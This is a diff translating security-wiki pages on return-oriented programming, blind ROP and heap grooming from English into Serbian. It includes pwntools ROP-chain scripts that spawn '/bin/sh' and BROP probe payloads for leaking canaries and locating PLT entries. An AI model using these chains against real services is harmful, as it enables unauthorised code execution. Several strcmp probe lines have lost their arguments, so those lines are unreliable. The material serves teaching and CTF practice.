+- Moguće je alocirati neku memoriju, napisati željenu vrednost, osloboditi je, ponovo alocirati i pošto su prethodni podaci još uvek prisutni, biće tretirani prema novoj očekivanoj strukturi u delu, što omogućava postavljanje vrednosti za dobijanje zastavice.
 - [**https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html**](https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html)
-  - In this case it's needed to write 4 inside an specific chunk which is the first one being allocated (even after force freeing all of them). On each new allocated chunk it's number in the array index is stored. Then, allocate 4 chunks (+ the initialy allocated), the last one will have 4 inside of it, free them and force the reallocation of the first one, which will use the last chunk freed which is the one with 4 inside of it.
+- U ovom slučaju potrebno je napisati 4 unutar specifičnog dela koji je prvi koji se alocira (čak i nakon prisilnog oslobađanja svih njih). Na svakom novom alociranom delu, njegov broj u indeksu niza se čuva. Zatim, alocirajte 4 dela (+ inicijalno alocirani), poslednji će imati 4 unutar njega, oslobodite ih i prisilite ponovnu alokaciju prvog, koji će koristiti poslednji oslobođeni deo koji je onaj sa 4 unutar njega.
diff --git a/src/binary-exploitation/rop-return-oriented-programing/README.md b/src/binary-exploitation/rop-return-oriented-programing/README.md
index 29e21bca5..5a4b1dfe5 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/README.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/README.md
@@ -2,45 +2,44 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## **Basic Information**
+## **Osnovne Informacije**
 
-**Return-Oriented Programming (ROP)** is an advanced exploitation technique used to circumvent security measures like **No-Execute (NX)** or **Data Execution Prevention (DEP)**. Instead of injecting and executing shellcode, an attacker leverages pieces of code already present in the binary or in loaded libraries, known as **"gadgets"**. Each gadget typically ends with a `ret` instruction and performs a small operation, such as moving data between registers or performing arithmetic operations. By chaining these gadgets together, an attacker can construct a payload to perform arbitrary operations, effectively bypassing NX/DEP protections.
+**Return-Oriented Programming (ROP)** je napredna tehnika eksploatacije koja se koristi za zaobilaženje sigurnosnih mera kao što su **No-Execute (NX)** ili **Data Execution Prevention (DEP)**. Umesto da se injektuje i izvršava shellcode, napadač koristi delove koda koji su već prisutni u binarnom fajlu ili u učitanim bibliotekama, poznatim kao **"gadgets"**. Svaki gadget obično se završava sa `ret` instrukcijom i izvršava malu operaciju, kao što je premestanje podataka između registara ili izvođenje aritmetičkih operacija. Povezivanjem ovih gadgets, napadač može konstruisati payload za izvođenje proizvoljnih operacija, efikasno zaobilazeći NX/DEP zaštite.
 
-### How ROP Works
+### Kako ROP Funkcioniše
 
-1. **Control Flow Hijacking**: First, an attacker needs to hijack the control flow of a program, typically by exploiting a buffer overflow to overwrite a saved return address on the stack.
-2. **Gadget Chaining**: The attacker then carefully selects and chains gadgets to perform the desired actions. This could involve setting up arguments for a function call, calling the function (e.g., `system("/bin/sh")`), and handling any necessary cleanup or additional operations.
-3. **Payload Execution**: When the vulnerable function returns, instead of returning to a legitimate location, it starts executing the chain of gadgets.
+1. **Otimaње Kontrole Tok**: Prvo, napadač treba da otme kontrolu toka programa, obično iskorišćavanjem buffer overflow-a da bi prepisao sačuvanu adresu povratka na steku.
+2. **Povezivanje Gadgets**: Napadač pažljivo bira i povezuje gadgets da bi izvršio željene radnje. Ovo može uključivati postavljanje argumenata za poziv funkcije, pozivanje funkcije (npr., `system("/bin/sh")`), i rukovanje svim potrebnim čišćenjem ili dodatnim operacijama.
+3. **Izvršenje Payload-a**: Kada ranjiva funkcija vrati, umesto da se vrati na legitimnu lokaciju, počinje da izvršava lanac gadgets.
 
-### Tools
+### Alati
 
-Typically, gadgets can be found using [**ROPgadget**](https://github.com/JonathanSalwan/ROPgadget), [**ropper**](https://github.com/sashs/Ropper) or directly from **pwntools** ([ROP](https://docs.pwntools.com/en/stable/rop/rop.html)).
+Obično se gadgets mogu pronaći koristeći [**ROPgadget**](https://github.com/JonathanSalwan/ROPgadget), [**ropper**](https://github.com/sashs/Ropper) ili direktno iz **pwntools** ([ROP](https://docs.pwntools.com/en/stable/rop/rop.html)).
 
-## ROP Chain in x86 Example
+## ROP Lanac u x86 Primeru
 
-### **x86 (32-bit) Calling conventions**
+### **x86 (32-bit) Konvencije Poziva**
 
-- **cdecl**: The caller cleans the stack. Function arguments are pushed onto the stack in reverse order (right-to-left). **Arguments are pushed onto the stack from right to left.**
-- **stdcall**: Similar to cdecl, but the callee is responsible for cleaning the stack.
+- **cdecl**: Pozivatelj čisti stek. Argumenti funkcije se stavljaju na stek u obrnutom redosledu (s desna na levo). **Argumenti se stavljaju na stek s desna na levo.**
+- **stdcall**: Slično cdecl, ali je pozvana funkcija odgovorna za čišćenje steka.
 
-### **Finding Gadgets**
+### **Pronalaženje Gadgets**
 
-First, let's assume we've identified the necessary gadgets within the binary or its loaded libraries. The gadgets we're interested in are:
+Prvo, pretpostavimo da smo identifikovali potrebne gadgets unutar binarnog fajla ili njegovih učitanih biblioteka. Gadgets koji nas zanimaju su:
 
-- `pop eax; ret`: This gadget pops the top value of the stack into the `EAX` register and then returns, allowing us to control `EAX`.
-- `pop ebx; ret`: Similar to the above, but for the `EBX` register, enabling control over `EBX`.
-- `mov [ebx], eax; ret`: Moves the value in `EAX` to the memory location pointed to by `EBX` and then returns. This is often called a **write-what-where gadget**.
-- Additionally, we have the address of the `system()` function available.
+- `pop eax; ret`: Ovaj gadget uzima gornju vrednost steka u `EAX` registar i zatim se vraća, omogućavajući nam kontrolu nad `EAX`.
+- `pop ebx; ret`: Slično prethodnom, ali za `EBX` registar, omogućavajući kontrolu nad `EBX`.
+- `mov [ebx], eax; ret`: Premesti vrednost u `EAX` na memorijsku lokaciju na koju pokazuje `EBX` i zatim se vraća. Ovo se često naziva **write-what-where gadget**.
+- Pored toga, imamo adresu funkcije `system()` dostupnu.
 
-### **ROP Chain**
+### **ROP Lanac**
 
-Using **pwntools**, we prepare the stack for the ROP chain execution as follows aiming to execute `system('/bin/sh')`, note how the chain starts with:
-
-1. A `ret` instruction for alignment purposes (optional)
-2. Address of `system` function (supposing ASLR disabled and known libc, more info in [**Ret2lib**](ret2lib/))
-3. Placeholder for the return address from `system()`
-4. `"/bin/sh"` string address (parameter for system function)
+Koristeći **pwntools**, pripremamo stek za izvršenje ROP lanca na sledeći način sa ciljem da izvršimo `system('/bin/sh')`, obratite pažnju kako lanac počinje sa:
 
+1. `ret` instrukcijom za svrhe usklađivanja (opciono)
+2. Adresom funkcije `system` (pretpostavljajući da je ASLR onemogućen i poznat libc, više informacija u [**Ret2lib**](ret2lib/))
+3. Mesto za adresu povratka iz `system()`
+4. Adresom stringa `"/bin/sh"` (parametar za funkciju system)
 ```python
 from pwn import *
 
@@ -59,10 +58,10 @@ ret_gadget = 0xcafebabe  # This could be any gadget that allows us to control th
 
 # Construct the ROP chain
 rop_chain = [
-    ret_gadget,    # This gadget is used to align the stack if necessary, especially to bypass stack alignment issues
-    system_addr,   # Address of system(). Execution will continue here after the ret gadget
-    0x41414141,    # Placeholder for system()'s return address. This could be the address of exit() or another safe place.
-    bin_sh_addr    # Address of "/bin/sh" string goes here, as the argument to system()
+ret_gadget,    # This gadget is used to align the stack if necessary, especially to bypass stack alignment issues
+system_addr,   # Address of system(). Execution will continue here after the ret gadget
+0x41414141,    # Placeholder for system()'s return address. This could be the address of exit() or another safe place.
+bin_sh_addr    # Address of "/bin/sh" string goes here, as the argument to system()
 ]
 
 # Flatten the rop_chain for use
@@ -74,28 +73,26 @@ payload = fit({offset: rop_chain})
 p.sendline(payload)
 p.interactive()
 ```
-
 ## ROP Chain in x64 Example
 
 ### **x64 (64-bit) Calling conventions**
 
-- Uses the **System V AMD64 ABI** calling convention on Unix-like systems, where the **first six integer or pointer arguments are passed in the registers `RDI`, `RSI`, `RDX`, `RCX`, `R8`, and `R9`**. Additional arguments are passed on the stack. The return value is placed in `RAX`.
-- **Windows x64** calling convention uses `RCX`, `RDX`, `R8`, and `R9` for the first four integer or pointer arguments, with additional arguments passed on the stack. The return value is placed in `RAX`.
-- **Registers**: 64-bit registers include `RAX`, `RBX`, `RCX`, `RDX`, `RSI`, `RDI`, `RBP`, `RSP`, and `R8` to `R15`.
+- Koristi **System V AMD64 ABI** konvenciju poziva na Unix-like sistemima, gde se **prvih šest celobrojnih ili pokazivačkih argumenata prenosi u registrima `RDI`, `RSI`, `RDX`, `RCX`, `R8`, i `R9`**. Dodatni argumenti se prenose na steku. Vraćena vrednost se smešta u `RAX`.
+- **Windows x64** konvencija poziva koristi `RCX`, `RDX`, `R8`, i `R9` za prva četiri celobrojna ili pokazivačka argumenta, dok se dodatni argumenti prenose na steku. Vraćena vrednost se smešta u `RAX`.
+- **Registri**: 64-bitni registri uključuju `RAX`, `RBX`, `RCX`, `RDX`, `RSI`, `RDI`, `RBP`, `RSP`, i `R8` do `R15`.
 
 #### **Finding Gadgets**
 
-For our purpose, let's focus on gadgets that will allow us to set the **RDI** register (to pass the **"/bin/sh"** string as an argument to **system()**) and then call the **system()** function. We'll assume we've identified the following gadgets:
+Za naše potrebe, fokusiraćemo se na gadgete koji će nam omogućiti da postavimo **RDI** registar (da prenesemo **"/bin/sh"** string kao argument za **system()**) i zatim pozovemo **system()** funkciju. Pretpostavićemo da smo identifikovali sledeće gadgete:
 
-- **pop rdi; ret**: Pops the top value of the stack into **RDI** and then returns. Essential for setting our argument for **system()**.
-- **ret**: A simple return, useful for stack alignment in some scenarios.
+- **pop rdi; ret**: Uzimanje gornje vrednosti steka u **RDI** i zatim vraćanje. Neophodno za postavljanje našeg argumenta za **system()**.
+- **ret**: Jednostavno vraćanje, korisno za poravnavanje steka u nekim scenarijima.
 
-And we know the address of the **system()** function.
+I znamo adresu **system()** funkcije.
 
 ### **ROP Chain**
 
-Below is an example using **pwntools** to set up and execute a ROP chain aiming to execute **system('/bin/sh')** on **x64**:
-
+Ispod je primer korišćenja **pwntools** za postavljanje i izvršavanje ROP lanca koji ima za cilj da izvrši **system('/bin/sh')** na **x64**:
 ```python
 from pwn import *
 
@@ -115,10 +112,10 @@ ret_gadget = 0xdeadbeefdeadbead     # ret gadget for alignment, if necessary
 
 # Construct the ROP chain
 rop_chain = [
-    ret_gadget,        # Alignment gadget, if needed
-    pop_rdi_gadget,    # pop rdi; ret
-    bin_sh_addr,       # Address of "/bin/sh" string goes here, as the argument to system()
-    system_addr        # Address of system(). Execution will continue here.
+ret_gadget,        # Alignment gadget, if needed
+pop_rdi_gadget,    # pop rdi; ret
+bin_sh_addr,       # Address of "/bin/sh" string goes here, as the argument to system()
+system_addr        # Address of system(). Execution will continue here.
 ]
 
 # Flatten the rop_chain for use
@@ -130,66 +127,65 @@ payload = fit({offset: rop_chain})
 p.sendline(payload)
 p.interactive()
 ```
+U ovom primeru:
 
-In this example:
+- Koristimo **`pop rdi; ret`** gadget da postavimo **`RDI`** na adresu **`"/bin/sh"`**.
+- Direktno skačemo na **`system()`** nakon postavljanja **`RDI`**, sa adresom **system()** u lancu.
+- **`ret_gadget`** se koristi za poravnavanje ako ciljno okruženje to zahteva, što je češće u **x64** da bi se osiguralo pravilno poravnavanje steka pre pozivanja funkcija.
 
-- We utilize the **`pop rdi; ret`** gadget to set **`RDI`** to the address of **`"/bin/sh"`**.
-- We directly jump to **`system()`** after setting **`RDI`**, with **system()**'s address in the chain.
-- **`ret_gadget`** is used for alignment if the target environment requires it, which is more common in **x64** to ensure proper stack alignment before calling functions.
+### Poravnavanje Steka
 
-### Stack Alignment
+**x86-64 ABI** osigurava da je **stek poravnat na 16 bajtova** kada se izvrši **call instrukcija**. **LIBC**, radi optimizacije performansi, **koristi SSE instrukcije** (kao što je **movaps**) koje zahtevaju ovo poravnavanje. Ako stek nije pravilno poravnat (što znači da **RSP** nije višekratnik 16), pozivi funkcijama kao što je **system** će propasti u **ROP lancu**. Da biste to ispravili, jednostavno dodajte **ret gadget** pre pozivanja **system** u vašem ROP lancu.
 
-**The x86-64 ABI** ensures that the **stack is 16-byte aligned** when a **call instruction** is executed. **LIBC**, to optimize performance, **uses SSE instructions** (like **movaps**) which require this alignment. If the stack isn't aligned properly (meaning **RSP** isn't a multiple of 16), calls to functions like **system** will fail in a **ROP chain**. To fix this, simply add a **ret gadget** before calling **system** in your ROP chain.
-
-## x86 vs x64 main difference
+## Glavna razlika između x86 i x64
 
 > [!TIP]
-> Since **x64 uses registers for the first few arguments,** it often requires fewer gadgets than x86 for simple function calls, but finding and chaining the right gadgets can be more complex due to the increased number of registers and the larger address space. The increased number of registers and the larger address space in **x64** architecture provide both opportunities and challenges for exploit development, especially in the context of Return-Oriented Programming (ROP).
+> Pošto **x64 koristi registre za prvih nekoliko argumenata,** često zahteva manje gadgeta nego x86 za jednostavne pozive funkcija, ali pronalaženje i povezivanje pravih gadgeta može biti složenije zbog povećanog broja registara i većeg adresnog prostora. Povećan broj registara i veći adresni prostor u **x64** arhitekturi pružaju i prilike i izazove za razvoj eksploatacija, posebno u kontekstu Programiranja Orijentisanog na Povratak (ROP).
 
-## ROP chain in ARM64 Example
+## ROP lanac u ARM64 primeru
 
-### **ARM64 Basics & Calling conventions**
+### **Osnovne informacije o ARM64 i konvencije pozivanja**
 
-Check the following page for this information:
+Proverite sledeću stranicu za ove informacije:
 
 {{#ref}}
 ../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
 {{#endref}}
 
-## Protections Against ROP
+## Zaštite protiv ROP
 
-- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/): These protections makes harder the use of ROP as the addresses of the gadgets changes between execution.
-- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/): In of a BOF, it's needed to bypass the stores stack canary to overwrite return pointers to abuse a ROP chain
-- **Lack of Gadgets**: If there aren't enough gadgets it won't be possible to generate a ROP chain.
+- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/): Ove zaštite otežavaju korišćenje ROP-a jer se adrese gadgeta menjaju između izvršavanja.
+- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/): U slučaju BOF-a, potrebno je zaobići skladištenje stack canary da bi se prepisali povratni pokazivači za zloupotrebu ROP lanca.
+- **Nedostatak Gadgeta**: Ako nema dovoljno gadgeta, neće biti moguće generisati ROP lanac.
 
-## ROP based techniques
+## Tehnike zasnovane na ROP-u
 
-Notice that ROP is just a technique in order to execute arbitrary code. Based in ROP a lot of Ret2XXX techniques were developed:
+Imajte na umu da je ROP samo tehnika za izvršavanje proizvoljnog koda. Na osnovu ROP-a razvijene su mnoge Ret2XXX tehnike:
 
-- **Ret2lib**: Use ROP to call arbitrary functions from a loaded library with arbitrary parameters (usually something like `system('/bin/sh')`.
+- **Ret2lib**: Koristi ROP za pozivanje proizvoljnih funkcija iz učitane biblioteke sa proizvoljnim parametrima (obično nešto poput `system('/bin/sh')`.
 
 {{#ref}}
 ret2lib/
 {{#endref}}
 
-- **Ret2Syscall**: Use ROP to prepare a call to a syscall, e.g. `execve`, and make it execute arbitrary commands.
+- **Ret2Syscall**: Koristi ROP za pripremu poziva na syscall, npr. `execve`, i izvršava proizvoljne komande.
 
 {{#ref}}
 rop-syscall-execv/
 {{#endref}}
 
-- **EBP2Ret & EBP Chaining**: The first will abuse EBP instead of EIP to control the flow and the second is similar to Ret2lib but in this case the flow is controlled mainly with EBP addresses (although t's also needed to control EIP).
+- **EBP2Ret & EBP Chaining**: Prvi će zloupotrebiti EBP umesto EIP da kontroliše tok, a drugi je sličan Ret2lib, ali u ovom slučaju tok se kontroliše uglavnom sa EBP adresama (iako je takođe potrebno kontrolisati EIP).
 
 {{#ref}}
 ../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
 {{#endref}}
 
-## Other Examples & References
+## Ostali primeri i reference
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions)
 - [https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html](https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html)
-  - 64 bit, Pie and nx enabled, no canary, overwrite RIP with a `vsyscall` address with the sole purpose or return to the next address in the stack which will be a partial overwrite of the address to get the part of the function that leaks the flag
+- 64 bita, Pie i nx omogućeni, bez canary, prepisivanje RIP-a sa `vsyscall` adresom sa jedinom svrhom da se vrati na sledeću adresu u steku koja će biti delimično prepisivanje adrese da bi se dobila deo funkcije koja otkriva zastavicu
 - [https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/)
-  - arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
+- arm64, bez ASLR, ROP gadget za izvršavanje steka i skakanje na shellcode u steku
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md b/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md
index 94d93bd6f..204378a68 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md
@@ -2,123 +2,123 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-The goal of this attack is to be able to **abuse a ROP via a buffer overflow without any information about the vulnerable binary**.\
-This attack is based on the following scenario:
+Cilj ovog napada je da se **zloupotrebi ROP putem prelivanja bafera bez ikakvih informacija o ranjivom binarnom fajlu**.\
+Ovaj napad se zasniva na sledećem scenariju:
 
-- A stack vulnerability and knowledge of how to trigger it.
-- A server application that restarts after a crash.
+- Ranjivost na steku i znanje o tome kako je aktivirati.
+- Serverska aplikacija koja se ponovo pokreće nakon pada.
 
-## Attack
+## Napad
 
-### **1. Find vulnerable offset** sending one more character until a malfunction of the server is detected
+### **1. Pronađi ranjivi offset** slanjem jednog dodatnog karaktera dok se ne otkrije kvar servera
 
-### **2. Brute-force canary** to leak it
+### **2. Brute-force canary** da se otkrije
 
-### **3. Brute-force stored RBP and RIP** addresses in the stack to leak them
+### **3. Brute-force sačuvanih RBP i RIP** adresa na steku da se otkriju
 
-You can find more information about these processes [here (BF Forked & Threaded Stack Canaries)](../common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md) and [here (BF Addresses in the Stack)](../common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md).
+Možete pronaći više informacija o ovim procesima [ovde (BF Forked & Threaded Stack Canaries)](../common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md) i [ovde (BF Adrese na steku)](../common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md).
 
-### **4. Find the stop gadget**
+### **4. Pronađi stop gadget**
 
-This gadget basically allows to confirm that something interesting was executed by the ROP gadget because the execution didn't crash. Usually, this gadget is going to be something that **stops the execution** and it's positioned at the end of the ROP chain when looking for ROP gadgets to confirm a specific ROP gadget was executed
+Ovaj gadget u suštini omogućava potvrdu da je nešto zanimljivo izvršeno putem ROP gadgeta jer izvršenje nije srušeno. Obično, ovaj gadget će biti nešto što **zaustavlja izvršenje** i nalazi se na kraju ROP lanca kada se traže ROP gadgeti da se potvrdi da je specifičan ROP gadget izvršen.
 
-### **5. Find BROP gadget**
+### **5. Pronađi BROP gadget**
 
-This technique uses the [**ret2csu**](ret2csu.md) gadget. And this is because if you access this gadget in the middle of some instructions you get gadgets to control **`rsi`** and **`rdi`**:
+Ova tehnika koristi [**ret2csu**](ret2csu.md) gadget. I to je zato što, ako pristupite ovom gadgetu usred nekih instrukcija, dobijate gadgete za kontrolu **`rsi`** i **`rdi`**:
 
 
https://www.scs.stanford.edu/brop/bittau-brop.pdf

 
-These would be the gadgets:
+Ovo bi bili gadgeti:
 
 - `pop rsi; pop r15; ret`
 - `pop rdi; ret`
 
-Notice how with those gadgets it's possible to **control 2 arguments** of a function to call.
+Primetite kako je sa tim gadgetima moguće **kontrolisati 2 argumenta** funkcije koju pozivamo.
 
-Also, notice that the ret2csu gadget has a **very unique signature** because it's going to be poping 6 registers from the stack. SO sending a chain like:
+Takođe, primetite da ret2csu gadget ima **veoma jedinstvenu potpis** jer će iz steka izvući 6 registara. Dakle, slanjem lanca poput:
 
 `'A' * offset + canary + rbp + ADDR + 0xdead * 6 + STOP`
 
-If the **STOP is executed**, this basically means an **address that is popping 6 registers** from the stack was used. Or that the address used was also a STOP address.
+Ako je **STOP izvršen**, to u suštini znači da je korišćena **adresa koja izbacuje 6 registara** iz steka. Ili da je korišćena adresa koja je takođe STOP adresa.
 
-In order to **remove this last option** a new chain like the following is executed and it must not execute the STOP gadget to confirm the previous one did pop 6 registers:
+Da bi se **uklonila ova poslednja opcija**, izvršava se novi lanac poput sledećeg i ne sme izvršiti STOP gadget da potvrdi da je prethodni izbacivao 6 registara:
 
 `'A' * offset + canary + rbp + ADDR`
 
-Knowing the address of the ret2csu gadget, it's possible to **infer the address of the gadgets to control `rsi` and `rdi`**.
+Poznavajući adresu ret2csu gadgeta, moguće je **izvesti adresu gadgeta za kontrolu `rsi` i `rdi`**.
 
-### 6. Find PLT
+### 6. Pronađi PLT
 
-The PLT table can be searched from 0x400000 or from the **leaked RIP address** from the stack (if **PIE** is being used). The **entries** of the table are **separated by 16B** (0x10B), and when one function is called the server doesn't crash even if the arguments aren't correct. Also, checking the address of a entry in the **PLT + 6B also doesn't crash** as it's the first code executed.
+PLT tabela može se pretraživati od 0x400000 ili od **otkrivene RIP adrese** sa steka (ako se koristi **PIE**). **Unosi** tabele su **odvojeni po 16B** (0x10B), i kada se pozove jedna funkcija, server se ne sruši čak i ako argumenti nisu tačni. Takođe, provera adrese jednog unosa u **PLT + 6B takođe ne sruši** jer je to prvi kod koji se izvršava.
 
-Therefore, it's possible to find the PLT table checking the following behaviours:
+Stoga, moguće je pronaći PLT tabelu proverom sledećih ponašanja:
 
-- `'A' * offset + canary + rbp + ADDR + STOP` -> no crash
-- `'A' * offset + canary + rbp + (ADDR + 0x6) + STOP` -> no crash
-- `'A' * offset + canary + rbp + (ADDR + 0x10) + STOP` -> no crash
+- `'A' * offset + canary + rbp + ADDR + STOP` -> nema rušenja
+- `'A' * offset + canary + rbp + (ADDR + 0x6) + STOP` -> nema rušenja
+- `'A' * offset + canary + rbp + (ADDR + 0x10) + STOP` -> nema rušenja
 
-### 7. Finding strcmp
+### 7. Pronalazak strcmp
 
-The **`strcmp`** function sets the register **`rdx`** to the length of the string being compared. Note that **`rdx`** is the **third argument** and we need it to be **bigger than 0** in order to later use `write` to leak the program.
+Funkcija **`strcmp`** postavlja registar **`rdx`** na dužinu stringa koji se upoređuje. Imajte na umu da je **`rdx`** **treći argument** i potrebno je da bude **veći od 0** kako bismo kasnije koristili `write` da otkrijemo program.
 
-It's possible to find the location of **`strcmp`** in the PLT based on its behaviour using the fact that we can now control the 2 first arguments of functions:
+Moguće je pronaći lokaciju **`strcmp`** u PLT-u na osnovu njenog ponašanja koristeći činjenicu da sada možemo kontrolisati prva 2 argumenta funkcija:
 
-- strcmp(\, \) -> crash
-- strcmp(\, \) -> crash
-- strcmp(\, \) -> crash
-- strcmp(\, \) -> no crash
+- strcmp(\, \) -> rušenje
+- strcmp(\, \) -> rušenje
+- strcmp(\, \) -> rušenje
+- strcmp(\, \) -> nema rušenja
 
-It's possible to check for this by calling each entry of the PLT table or by using the **PLT slow path** which basically consist on **calling an entry in the PLT table + 0xb** (which calls to **`dlresolve`**) followed in the stack by the **entry number one wishes to probe** (starting at zero) to scan all PLT entries from the first one:
+Moguće je proveriti ovo pozivajući svaki unos PLT tabele ili koristeći **PLT spor put** koji se u suštini sastoji od **pozivanja unosa u PLT tabeli + 0xb** (što poziva **`dlresolve`**) praćeno na steku **brojem unosa koji se želi proveriti** (počinjajući od nule) da skeniramo sve PLT unose od prvog:
 
-- strcmp(\, \) -> crash
-  - `b'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + p64(0x300) + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP` -> Will crash
-- strcmp(\, \) -> crash
-  - `b'A' * offset + canary + rbp + (BROP + 0x9) + p64(0x300) + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP`
-- strcmp(\, \) -> no crash
-  - `b'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP`
+- strcmp(\, \) -> rušenje
+- `b'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + p64(0x300) + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP` -> Rušiće
+- strcmp(\, \) -> rušenje
+- `b'A' * offset + canary + rbp + (BROP + 0x9) + p64(0x300) + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP`
+- strcmp(\, \) -> nema rušenja
+- `b'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP`
 
-Remember that:
+Zapamtite da:
 
-- BROP + 0x7 point to **`pop RSI; pop R15; ret;`**
-- BROP + 0x9 point to **`pop RDI; ret;`**
-- PLT + 0xb point to a call to **dl_resolve**.
+- BROP + 0x7 ukazuje na **`pop RSI; pop R15; ret;`**
+- BROP + 0x9 ukazuje na **`pop RDI; ret;`**
+- PLT + 0xb ukazuje na poziv **dl_resolve**.
 
-Having found `strcmp` it's possible to set **`rdx`** to a value bigger than 0.
+Nakon što se pronađe `strcmp`, moguće je postaviti **`rdx`** na vrednost veću od 0.
 
 > [!TIP]
-> Note that usually `rdx` will host already a value bigger than 0, so this step might not be necesary.
+> Imajte na umu da obično `rdx` već sadrži vrednost veću od 0, tako da ovaj korak možda nije neophodan.
 
-### 8. Finding Write or equivalent
+### 8. Pronalazak Write ili ekvivalentnog
 
-Finally, it's needed a gadget that exfiltrates data in order to exfiltrate the binary. And at this moment it's possible to **control 2 arguments and set `rdx` bigger than 0.**
+Na kraju, potreban je gadget koji eksfiltrira podatke kako bi se eksfiltrirao binarni fajl. I u ovom trenutku moguće je **kontrolisati 2 argumenta i postaviti `rdx` veći od 0.**
 
-There are 3 common funtions taht could be abused for this:
+Postoje 3 uobičajene funkcije koje bi mogle biti zloupotrebljene za ovo:
 
 - `puts(data)`
 - `dprintf(fd, data)`
 - `write(fd, data, len(data)`
 
-However, the original paper only mentions the **`write`** one, so lets talk about it:
+Međutim, originalni rad pominje samo **`write`**, pa hajde da pričamo o tome:
 
-The current problem is that we don't know **where the write function is inside the PLT** and we don't know **a fd number to send the data to our socket**.
+Trenutni problem je što ne znamo **gde se funkcija write nalazi unutar PLT-a** i ne znamo **fd broj da pošaljemo podatke našem soketu**.
 
-However, we know **where the PLT table is** and it's possible to find write based on its **behaviour**. And we can create **several connections** with the server an d use a **high FD** hoping that it matches some of our connections.
+Međutim, znamo **gde se nalazi PLT tabela** i moguće je pronaći write na osnovu njenog **ponašanja**. I možemo stvoriti **nekoliko veza** sa serverom i koristiti **visok FD** nadajući se da će se poklopiti sa nekim od naših veza.
 
-Behaviour signatures to find those functions:
+Potpis ponašanja za pronalaženje tih funkcija:
 
-- `'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + p64(0) + p64(0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> If there is data printed, then puts was found
-- `'A' * offset + canary + rbp + (BROP + 0x9) + FD + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> If there is data printed, then dprintf was found
-- `'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + (RIP + 0x1) + p64(0x0) + (PLT + 0xb ) + p64(STRCMP ENTRY) + (BROP + 0x9) + FD + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> If there is data printed, then write was found
+- `'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + p64(0) + p64(0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> Ako se podaci ispisuju, onda je pronađen puts
+- `'A' * offset + canary + rbp + (BROP + 0x9) + FD + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> Ako se podaci ispisuju, onda je pronađen dprintf
+- `'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + (RIP + 0x1) + p64(0x0) + (PLT + 0xb ) + p64(STRCMP ENTRY) + (BROP + 0x9) + FD + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> Ako se podaci ispisuju, onda je pronađen write
 
-## Automatic Exploitation
+## Automatska eksploatacija
 
 - [https://github.com/Hakumarachi/Bropper](https://github.com/Hakumarachi/Bropper)
 
-## References
+## Reference
 
-- Original paper: [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf)
+- Originalni rad: [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf)
 - [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop)
 
